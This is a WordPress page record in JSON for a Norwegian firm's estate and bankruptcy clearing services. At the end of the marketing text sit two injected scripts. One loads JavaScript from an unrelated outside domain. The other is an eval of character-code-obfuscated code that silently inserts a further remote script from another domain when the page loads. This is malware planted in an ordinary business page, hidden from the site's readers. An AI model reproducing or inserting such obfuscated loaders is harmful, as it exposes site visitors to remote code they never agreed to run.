{"id":4165,"date":"2020-11-08T12:04:42","date_gmt":"2020-11-08T11:04:42","guid":{"rendered":"http:\/\/ms24.no\/?page_id=4165"},"modified":"2021-03-30T08:16:21","modified_gmt":"2021-03-30T06:16:21","slug":"dodsbo-rydding","status":"publish","type":"page","link":"https:\/\/ms24.no\/?page_id=4165","title":{"rendered":"D\u00f8dsbo &#038; Rydding"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/ms24.no\/wp-content\/uploads\/2020\/12\/rodet-dodsbo-med-klaver-billeder-900x500.jpg\" alt=\"\" width=\"900\" height=\"500\" \/><\/p>\n<h2>D\u00f8dsbo<\/h2>\n<p>Milj\u00f8 Solutions AS i tar seg av hele prosessen i forbindelse med t\u00f8mming, rydding, sortering, bort kj\u00f8ring, vasking av d\u00f8dsbo.<\/p>\n<h2><\/h2>\n<p>Vi har flere \u00e5r som samarbeider med b\u00e5de advokater og eiendomsmeglerforetak i forbindelse med skifte og behandling av d\u00f8dsbo. Dette gir oss b\u00e5de lang erfaring og ekspertise innen alle ledd i prosessen<\/p>\n<h2>Konkursbo \/ Bedrifts<\/h2>\n<p>Vi hjelper til med hele prosessen. ledig kapasitet p\u00e5 dager.<br \/>\nVi T\u00f8mmer, Rydder, Kj\u00f8rerbort &amp; Sorterer alt i forbindelse med konkursbo \/ avvikling av kontor, lager, butikklokaler og alt annet av n\u00e6ringsvirksomhet. Vi s\u00f8reger for hele prosessen g\u00e5r smertefritt med en leverand\u00f8r for alle oppgaver krever renhold med 100% garanti slik at lokalene er klare for tilbakelevering til g\u00e5rdeier.<br \/>\nVi tilbyr 100% pris og kvalitetsgaranti p\u00e5 alt arbeid utlagt av oss.<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>D\u00f8dsbo Milj\u00f8 Solutions AS i tar seg av hele prosessen i forbindelse med t\u00f8mming, rydding, sortering, bort kj\u00f8ring, vasking av d\u00f8dsbo. Vi har flere \u00e5r som samarbeider med b\u00e5de advokater og eiendomsmeglerforetak i forbindelse med skifte og behandling av d\u00f8dsbo. Dette gir oss b\u00e5de lang erfaring og ekspertise innen alle ledd i prosessen Konkursbo \/ [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_header_footer","meta":{"footnotes":""},"class_list":["post-4165","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/4165","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4165"}],"version-history":[{"count":37,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/4165\/revisions"}],"predecessor-version":[{"id":5649,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/4165\/revisions\/5649"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4165"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}